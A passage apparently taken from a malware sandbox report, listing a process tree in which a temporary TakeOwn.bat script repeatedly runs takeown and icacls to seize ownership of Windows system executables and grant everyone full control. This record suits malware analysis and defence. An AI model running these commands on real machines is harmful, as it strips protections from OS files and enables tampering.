C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..oler-filterpipeline_31bf3856ad364e35_10.0.19041.867_none_099246ae3a45708c\r\printfilterpipelinesvc.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\f\ntprint.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\f\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\f\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\ntprint.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\r\ntprint.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\r\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1288_none_64cb20c6329bf2bd\r\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1_none_a5f487c01cc9bd1f\ntprint.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1_none_a5f487c01cc9bd1f\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.19041.1_none_a5f487c01cc9bd1f\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\plasrv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\plasrv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\plasrv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleExperienceHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleExperienceHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleExperienceHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\f\PeopleExperienceHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\f\PeopleExperienceHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\f\PeopleExperienceHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleExperienceHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleExperienceHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleExperienceHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\r\PeopleExperienceHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\r\PeopleExperienceHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\r\PeopleExperienceHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\f\wpnpinst.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\f\wpnpinst.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\f\wpnpinst.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\r\wpnpinst.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\r\wpnpinst.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\r\wpnpinst.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\wpnpinst.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\wpnpinst.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1288_none_ff9a0c377d92f65b\wpnpinst.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1_none_40c3733167c0c0bd\wpnpinst.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1_none_40c3733167c0c0bd\wpnpinst.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.19041.1_none_40c3733167c0c0bd\wpnpinst.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\lodctr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\lodctr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\lodctr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\unlodctr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\unlodctr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.19041.1_none_adf98e02f565c8fe\unlodctr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpq.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpq.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpq.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_10.0.19041.1_none_69f4af04dd2c1f80\lpr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmEngine.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmEngine.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmEngine.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmUi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmUi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.1_none_37ab35f7e4b21a45\PrintBrmUi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmEngine.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmEngine.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmEngine.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmUi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmUi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\f\PrintBrmUi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmEngine.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmEngine.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmEngine.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmUi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmUi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\PrintBrmUi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmEngine.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmEngine.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmEngine.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmUi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmUi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.19041.746_none_5fb37340a423d88f\r\PrintBrmUi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_c9f3f831b5b3535d\PinningConfirmationDialog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_c9f3f831b5b3535d\PinningConfirmationDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_c9f3f831b5b3535d\PinningConfirmationDialog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\f\PinningConfirmationDialog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\f\PinningConfirmationDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\f\PinningConfirmationDialog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\PinningConfirmationDialog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\PinningConfirmationDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\PinningConfirmationDialog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\r\PinningConfirmationDialog.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\r\PinningConfirmationDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_f20ecec27517964b\r\PinningConfirmationDialog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.1_none_21244f0b33e2b22d\PerceptionSimulationInput.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.1_none_21244f0b33e2b22d\PerceptionSimulationInput.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.1_none_21244f0b33e2b22d\PerceptionSimulationInput.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\f\PerceptionSimulationInput.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\f\PerceptionSimulationInput.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\f\PerceptionSimulationInput.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\PerceptionSimulationInput.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\PerceptionSimulationInput.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\PerceptionSimulationInput.exe" /grant "everyone":(f)3⤵
-
-
-
